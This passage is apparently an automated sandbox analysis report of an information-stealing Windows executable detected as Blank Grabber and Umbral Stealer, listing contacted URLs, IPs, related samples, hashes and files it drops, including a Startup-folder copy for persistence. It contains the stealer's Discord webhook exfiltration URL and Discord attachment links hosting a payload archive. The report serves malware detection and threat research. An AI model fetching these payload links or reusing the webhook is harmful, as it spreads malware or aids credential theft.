                        https://media.discordapp.net/attachments/1193832993945563176/12700031IDLBk4XMUa.exe, 00000000.00000002.1853846152.0000020097FC8000.00000004.00000800.00020000.00000000.sdmp, IDLBk4XMUa.exe, 00000000.00000002.1853846152.0000020097FEE000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://contoso.com/Licensepowershell.exe, 0000001F.00000002.1787792415.000002B365B72000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://discordapp.com/api/v9/users/IDLBk4XMUa.exe, NcIxl.scr.0.drfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        https://contoso.com/Iconpowershell.exe, 0000001F.00000002.1787792415.000002B365B72000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://cdn.discordapp.com/attachments/1193832993945563176/1270003120704983090/Umbral-855271.zip?ex=IDLBk4XMUa.exe, 00000000.00000002.1853846152.00000200981D6000.00000004.00000800.00020000.00000000.sdmp, IDLBk4XMUa.exe, 00000000.00000002.1853846152.0000020097FC8000.00000004.00000800.00020000.00000000.sdmp, IDLBk4XMUa.exe, 00000000.00000002.1853846152.0000020097FEE000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.microsoft.powershell.exe, 00000017.00000002.1609749890.00000268E4994000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://github.com/Pester/Pesterpowershell.exe, 0000001F.00000002.1666525413.000002B35722D000.00000004.00000800.00020000.00000000.sdmpfalse
                        • 1%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        https://media.discordapp.net/attachments/1193832993945563176/1270003120704983090/Umbral-855271.zip?eIDLBk4XMUa.exe, 00000000.00000002.1853846152.00000200981D6000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://github.com/Blank-c/Umbral-StealerNcIxl.scr.0.drfalse
                        • 2%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000000E.00000002.1329869038.00000296A20D9000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://contoso.com/powershell.exe, 0000001F.00000002.1787792415.000002B365B72000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://nuget.org/nuget.exepowershell.exe, 0000000E.00000002.1352099439.00000296B1F23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1472391060.000001714092F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1472391060.0000017140A65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1406940608.000001713217B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1598197185.00000268DC603000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1598197185.00000268DC4CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1501813007.00000268CDE0A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1666525413.000002B357376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1787792415.000002B365A3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1787792415.000002B365B72000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://ip-api.comIDLBk4XMUa.exe, 00000000.00000002.1853846152.0000020097FD4000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://oneget.orgXpowershell.exe, 00000014.00000002.1406940608.00000171320AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1501813007.00000268CDA18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1666525413.000002B356E61000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://ptb.discord.com/api/webhooks/1193833046810566716/Ip5p47J2qEw7d2YvXLGh3HLrizvUKpbZJnMXQxzQS4NIDLBk4XMUa.exe, 00000000.00000002.1853846152.00000200980F6000.00000004.00000800.00020000.00000000.sdmp, IDLBk4XMUa.exe, 00000000.00000002.1853846152.0000020098129000.00000004.00000800.00020000.00000000.sdmp, IDLBk4XMUa.exe, 00000000.00000002.1853846152.0000020097F71000.00000004.00000800.00020000.00000000.sdmptrue
                        • 1%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        https://aka.ms/pscore68powershell.exe, 0000000E.00000002.1329869038.00000296A1EB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1372613414.000001D7A745C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1372613414.000001D7A7449000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1406940608.00000171308B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1501813007.00000268CC451000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1666525413.000002B3559C1000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://ptb.discord.comIDLBk4XMUa.exe, 00000000.00000002.1853846152.00000200980F6000.00000004.00000800.00020000.00000000.sdmptrue
                        • 1%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameIDLBk4XMUa.exe, 00000000.00000002.1853846152.0000020097F71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1329869038.00000296A1EB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1372613414.000001D7A7425000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1406940608.00000171308B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1501813007.00000268CC451000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1666525413.000002B3559C1000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://oneget.orgpowershell.exe, 00000014.00000002.1406940608.00000171320AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1501813007.00000268CDA18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1666525413.000002B356E61000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://ip-api.com/json/?fields=225545IDLBk4XMUa.exe, NcIxl.scr.0.drfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        http://ip-api.com/line/?fields=hostingI7AB5C494-39F5-4941-9163-47F54D6D5016I032E02B4-0499-05C3-0806-IDLBk4XMUa.exe, NcIxl.scr.0.drfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        208.95.112.1
                        		ip-api.comUnited States
                        		53334TUT-ASUStrue
                        162.159.138.232
                        		ptb.discord.comUnited States
                        		13335CLOUDFLARENETUStrue

                        General Information

                        Joe Sandbox version:40.0.0 Tourmaline
                        Analysis ID:1487993
                        Start date and time:2024-08-05 14:57:05 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 7m 58s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:43
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:IDLBk4XMUa.exe
                        renamed because original name is a hash value
                        Original Sample Name:0933217d8ea84d9341154ecc34a3f231cf2ff0e70d67dbe190265c7e26b96cfb.exe
                        Detection:MAL
                        Classification:mal100.troj.adwa.spyw.evad.winEXE@39/24@3/2
                        EGA Information:
                        • Successful, ratio: 16.7%
                        HCA Information:
                        • Successful, ratio: 66%
                        • Number of executed functions: 238
                        • Number of non-executed functions: 0
                        Cookbook Comments:
                        • Found application associated with file extension: .exe

                        Warnings

                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                        • Excluded IPs from analysis (whitelisted): 216.58.206.35
                        • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, gstatic.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                        • Execution Graph export aborted for target powershell.exe, PID 6328 because it is empty
                        • Execution Graph export aborted for target powershell.exe, PID 7436 because it is empty
                        • Execution Graph export aborted for target powershell.exe, PID 7696 because it is empty
                        • Execution Graph export aborted for target powershell.exe, PID 7820 because it is empty
                        • Execution Graph export aborted for target powershell.exe, PID 8040 because it is empty
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size exceeded maximum capacity and may have missing disassembly code.
                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                        • Report size getting too big, too many NtCreateKey calls found.
                        • Report size getting too big, too many NtOpenFile calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        08:58:02API Interceptor5x Sleep call for process: WMIC.exe modified
                        08:58:05API Interceptor27x Sleep call for process: powershell.exe modified
                        08:58:05API Interceptor3449x Sleep call for process: IDLBk4XMUa.exe modified

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        208.95.112.1Vjy8d2EoqK.exeGet hashmaliciousBlank Grabber, DCRat, XWormBrowse
                        • ip-api.com/json/?fields=225545
                        3.bin.exeGet hashmaliciousGo InjectorBrowse
                        • ip-api.com/json/?fields=status,message,query,country,regionName,city,isp,timezone
                        raw.ps1Get hashmaliciousUnknownBrowse
                        • ip-api.com/json/?fields=status,message,query,country,regionName,city,isp,timezone
                        #U202f#U202f#U2005#U00a0.scr.exeGet hashmaliciousBlank GrabberBrowse
                        • ip-api.com/json/?fields=225545
                        NaOH.exeGet hashmaliciousXWormBrowse
                        • ip-api.com/line/?fields=hosting
                        SSPInstallerV2.exeGet hashmaliciousBlank Grabber, Umbral Stealer, XWormBrowse
                        • ip-api.com/json/?fields=225545
                        XWorm.V5.6.exeGet hashmaliciousXWormBrowse
                        • ip-api.com/line/?fields=hosting
                        oc 1337.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                        • ip-api.com/line/?fields=hosting
                        Xbox.exeGet hashmaliciousXWorm, XmrigBrowse
                        • ip-api.com/line/?fields=hosting
                        setup.exeGet hashmaliciousXWormBrowse
                        • ip-api.com/line/?fields=hosting
                        162.159.138.232http://dc.tensgpt.com/branding/Get hashmaliciousUnknownBrowse
                          SSPInstallerV2.exeGet hashmaliciousBlank Grabber, Umbral Stealer, XWormBrowse
                            VaTlw2kNGc.exeGet hashmaliciousBlank Grabber, DCRat, PureLog Stealer, Xmrig, zgRATBrowse
                              Zoom_workspace.htaGet hashmaliciousCobalt Strike, Clipboard HijackerBrowse
                                qqgv6uKJOd.exeGet hashmaliciousClipboard HijackerBrowse
                                  http://discord-proxy.tassadar2002.workers.dev/Get hashmaliciousUnknownBrowse
                                    http://dapi.190823.xyz/Get hashmaliciousUnknownBrowse
                                      LisectAVT_2403002A_147.exeGet hashmaliciousBlank GrabberBrowse
                                        LisectAVT_2403002A_368.exeGet hashmaliciousBlank Grabber, DCRat, Umbral StealerBrowse
                                          Setup 3.0.0.msiGet hashmaliciousUnknownBrowse

                                            Domains

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            ip-api.comVjy8d2EoqK.exeGet hashmaliciousBlank Grabber, DCRat, XWormBrowse
                                            • 208.95.112.1
                                            3.bin.exeGet hashmaliciousGo InjectorBrowse
                                            • 208.95.112.1
                                            raw.ps1Get hashmaliciousUnknownBrowse
                                            • 208.95.112.1
                                            #U202f#U202f#U2005#U00a0.scr.exeGet hashmaliciousBlank GrabberBrowse
                                            • 208.95.112.1
                                            NaOH.exeGet hashmaliciousXWormBrowse
                                            • 208.95.112.1
                                            SSPInstallerV2.exeGet hashmaliciousBlank Grabber, Umbral Stealer, XWormBrowse
                                            • 208.95.112.1
                                            XWorm.V5.6.exeGet hashmaliciousXWormBrowse
                                            • 208.95.112.1
                                            oc 1337.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                            • 208.95.112.1
                                            Xbox.exeGet hashmaliciousXWorm, XmrigBrowse
                                            • 208.95.112.1
                                            setup.exeGet hashmaliciousXWormBrowse
                                            • 208.95.112.1
                                            ptb.discord.comgolang-modules.exeGet hashmaliciousUnknownBrowse
                                            • 162.159.136.232
                                            golang-modules.exeGet hashmaliciousUnknownBrowse
                                            • 162.159.137.232
                                            SetupSpuckwars_1.15.5.exeGet hashmaliciousUnknownBrowse
                                            • 162.159.128.233
                                            SetupSpuckwars_1.15.5.exeGet hashmaliciousUnknownBrowse
                                            • 162.159.128.233
                                            KzqQe0QtRd.exeGet hashmaliciousUnknownBrowse
                                            • 162.159.137.232
                                            PAP46E1UkZ.exeGet hashmaliciousUnknownBrowse
                                            • 162.159.128.233
                                            A4AxThCBqS.exeGet hashmaliciousNanocore, Luna Logger, Umbral StealerBrowse
                                            • 162.159.136.232
                                            SecuriteInfo.com.Variant.Jatif.7130.11703.17675.exeGet hashmaliciousCKS Stealer, Spark RATBrowse
                                            • 162.159.137.232
                                            SecuriteInfo.com.Variant.Jatif.7130.11703.17675.exeGet hashmaliciousCKS Stealer, Spark RATBrowse
                                            • 162.159.138.232
                                            Lunar_Builder.exeGet hashmaliciousItroublveBOT StealerBrowse
                                            • 162.159.138.232

                                            ASNs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            CLOUDFLARENETUShttps://t.co/Yz5GS35vAmGet hashmaliciousHTMLPhisherBrowse
                                            • 104.17.25.14
                                            http://mission-bbq.com/Get hashmaliciousUnknownBrowse
                                            • 162.159.135.42
                                            Yg4Sqy06Al.exeGet hashmaliciousFormBookBrowse
                                            • 172.67.189.102
                                            Vjy8d2EoqK.exeGet hashmaliciousBlank Grabber, DCRat, XWormBrowse
                                            • 162.159.135.233
                                            New Purchase Order #98540-00_pdf.exeGet hashmaliciousFormBookBrowse
                                            • 104.21.59.240
                                            TVC4030004.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                            • 172.67.74.152
                                            uX2M9PYDL6.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                            • 188.114.97.3
                                            kFVFbXvmmW.exeGet hashmaliciousAgentTeslaBrowse
                                            • 104.26.12.205
                                            http://url4388.parishsoft.com/ls/click?upn=u001.Vpzjdhwu4OAeGaWRMrv2bG-2BoISIIiNCoMwLNb33p6s9puXP6QsXcB55N2OsZ6QIQL6ualISvA6R9yFsi3QAkMw-3D-3DXnsm_4xqsswqm6jfqRi4Z9uMkjQPQ2PkIkpXiS7DDGAZwwqNkGayHBacrLCvWB6Ugb4mkRZ3VOwT8CtgdDvVzoEhuyk6RBXBzMUCiGffZILgz6kR-2FL0nL0bxsibxsiUMijyxKfmLW891ickSrYKqWpAo9hCEcRsdCC2tujtVQQrSV8Vz2uroyKvadQlzhc4JKhA7jHhTUxKABBY7atxFYwVCPFB5me96L6dyoMp-2FtDuDTirn5yJY0-2FgMFIFSldNhOOGkWZFlvdMYsSUWRFKEWdA6MNjw9lUNWdhKLgUqvqHz9yAXZOqRQ6z8xUDj4ZDVoAP4jrKwzE6kfZ8QZJlON1P64VH3LTUAC-2F3-2Bu3E-2Bv-2F-2FvtH0U-3DGet hashmaliciousUnknownBrowse
                                            • 1.1.1.1
                                            https://shoutout.wix.com/so/57P4LPRB3/c?w=QyObRC2ER359WwNEkFtFRIXvHqRVLYBWPJZndFVxaFM.eyJ1IjoiaHR0cHM6Ly90LmNvL2dYUTZ1aVRTYzQiLCJyIjoiNzk1YmZlN2YtZDJkZS00NTQzLTkwODItYWRmOTcyNmMzMTVjIiwibSI6Im1haWwiLCJjIjoiMDAwMDAwMDAtMDAwMC0wMDAwLTAwMDAtMDAwMDAwMDAwMDAwIn0Get hashmaliciousPhisherBrowse
                                            • 188.114.96.3
                                            TUT-ASUSVjy8d2EoqK.exeGet hashmaliciousBlank Grabber, DCRat, XWormBrowse
                                            • 208.95.112.1
                                            3.bin.exeGet hashmaliciousGo InjectorBrowse
                                            • 208.95.112.1
                                            raw.ps1Get hashmaliciousUnknownBrowse
                                            • 208.95.112.1
                                            #U202f#U202f#U2005#U00a0.scr.exeGet hashmaliciousBlank GrabberBrowse
                                            • 208.95.112.1
                                            NaOH.exeGet hashmaliciousXWormBrowse
                                            • 208.95.112.1
                                            SSPInstallerV2.exeGet hashmaliciousBlank Grabber, Umbral Stealer, XWormBrowse
                                            • 208.95.112.1
                                            XWorm.V5.6.exeGet hashmaliciousXWormBrowse
                                            • 208.95.112.1
                                            oc 1337.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                            • 208.95.112.1
                                            Xbox.exeGet hashmaliciousXWorm, XmrigBrowse
                                            • 208.95.112.1
                                            setup.exeGet hashmaliciousXWormBrowse
                                            • 208.95.112.1

                                            JA3 Fingerprints

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            3b5074b1b5d032e5620f69f9f700ff0eVjy8d2EoqK.exeGet hashmaliciousBlank Grabber, DCRat, XWormBrowse
                                            • 162.159.138.232
                                            doc_RFQ NEW ORDER #2400228341.pdf.exeGet hashmaliciousAsyncRATBrowse
                                            • 162.159.138.232
                                            TVC4030004.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                            • 162.159.138.232
                                            kFVFbXvmmW.exeGet hashmaliciousAgentTeslaBrowse
                                            • 162.159.138.232
                                            https://shoutout.wix.com/so/57P4LPRB3/c?w=QyObRC2ER359WwNEkFtFRIXvHqRVLYBWPJZndFVxaFM.eyJ1IjoiaHR0cHM6Ly90LmNvL2dYUTZ1aVRTYzQiLCJyIjoiNzk1YmZlN2YtZDJkZS00NTQzLTkwODItYWRmOTcyNmMzMTVjIiwibSI6Im1haWwiLCJjIjoiMDAwMDAwMDAtMDAwMC0wMDAwLTAwMDAtMDAwMDAwMDAwMDAwIn0Get hashmaliciousPhisherBrowse
                                            • 162.159.138.232
                                            Payment receipt.exeGet hashmaliciousAgentTeslaBrowse
                                            • 162.159.138.232
                                            https://hamilton.cmail20.com/t/r-e-tdtrkhul-niyflludj-b/Get hashmaliciousUnknownBrowse
                                            • 162.159.138.232
                                            009347280261.AWB.PEK.CO.227.20200508.240751.20200507.230805.22162.exeGet hashmaliciousSnake KeyloggerBrowse
                                            • 162.159.138.232
                                            http://lmctgiveaway.comGet hashmaliciousUnknownBrowse
                                            • 162.159.138.232
                                            SOF Documents PDF.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                            • 162.159.138.232

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\NcIxl.scr

                                            Download File
                                            Process:C:\Users\user\Desktop\IDLBk4XMUa.exe
                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Category:dropped
                                            Size (bytes):235008
                                            Entropy (8bit):6.051659594908541
                                            Encrypted:false
                                            SSDEEP:6144:dloZM3fsXtioRkts/cnnK6cMlpGZ7lTwk7tiTlwsJtSb8e1mdi:/oZ1tlRk83MlpGZ7lTwk7tiTlwsJIH
                                            MD5:AE3713305401315A3B520E84FB786FE5
                                            SHA1:914BD258C204E4CDDAB9DC0DBFB9C7134659AD57
                                            SHA-256:0933217D8EA84D9341154ECC34A3F231CF2FF0E70D67DBE190265C7E26B96CFB
                                            SHA-512:AE29D0C4C9106DCFBD4A212968D7D8B87236C2F39CE37435D3A658FE1B42875E44CC65C98F818391A8051312811B51DA747EFEF5FA347F3A053B58454BD1E155
                                            Malicious:true
                                            Yara Hits:
                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\NcIxl.scr, Author: Joe Security
                                            • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\NcIxl.scr, Author: Joe Security
                                            • Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attemping to enumerate video devices using WMI, Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\NcIxl.scr, Author: ditekSHen
                                            Antivirus:
                                            • Antivirus: Avira, Detection: 100%
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: ReversingLabs, Detection: 82%
                                            • Antivirus: Virustotal, Detection: 86%, Browse
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l.a..........."...0.................. ........@.. ....................................`.................................H...S.......P...........................,................................................ ............... ..H............text........ ...................... ..`.rsrc...P...........................@..@.reloc..............................@..B........................H.......@...........6.....................................................{....*..{....*V.(......}......}....*...0..A........u........4.,/(.....{.....{....o....,.(.....{.....{....o....*.*.*. ... )UU.Z(.....{....o....X )UU.Z(.....{....o....X*...0..b........r...p......%..{.......%q.........-.&.+.......o.....%..{.......%q.........-.&.+.......o.....(....*...0..w.............%.o...(.........~....s..........]..........~.....".".~.....\.\.~......b.~.......f.~.......n.~.......r.~...

                                            C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\NcIxl.scr:Zone.Identifier

                                            Download File
                                            Process:C:\Users\user\Desktop\IDLBk4XMUa.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):26
                                            Entropy (8bit):3.95006375643621
                                            Encrypted:false
                                            SSDEEP:3:ggPYV:rPYV
                                            MD5:187F488E27DB4AF347237FE461A079AD
                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                            Malicious:true
                                            Preview:[ZoneTransfer]....ZoneId=0

                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\IDLBk4XMUa.exe.log

                                            Download File
                                            Process:C:\Users\user\Desktop\IDLBk4XMUa.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:modified
                                            Size (bytes):1965
                                            Entropy (8bit):5.377802142292312
                                            Encrypted:false
                                            SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6owHptHTHhAHKKkpLHDJHqHGHK+HKs:iq+wmj0qCYqGSI6owJtzHeqKkpLVKmqs
                                            MD5:582A844EB067319F705A5ADF155DBEB0
                                            SHA1:68B791E0F77249BF83CD4B23A6C4A773365E2CAD
                                            SHA-256:E489CF4E6C01EFE8827F172607D7E3CD89C4870B0B0CA5A33EFE64577E2CB8A9
                                            SHA-512:6F530A0E2D3910459AFEFD0295ACA93D3814AB98D9A6E2BE1C2B8B717F075C87EF908BBF955E38F7B976EC51ED512645D13D0FB60AC865867E573060C5D76B59
                                            Malicious:true
                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System

                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):64
                                            Entropy (8bit):0.34726597513537405
                                            Encrypted:false
                                            SSDEEP:3:Nlll:Nll
                                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                            Malicious:false
                                            Preview:@...e...........................................................

                                            C:\Users\user\AppData\Local\Temp\SLOjxAb9vnp2MT3

                                            Download File
                                            Process:C:\Users\user\Desktop\IDLBk4XMUa.exe
                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                            Category:dropped
                                            Size (bytes):20480
                                            Entropy (8bit):0.6732424250451717
                                            Encrypted:false
                                            SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                            MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                            SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                            SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                            SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                            Malicious:false
                                            Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2rltaeg2.2yr.ps1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5ojlbdrq.krq.psm1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dslnb4ki.mid.ps1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
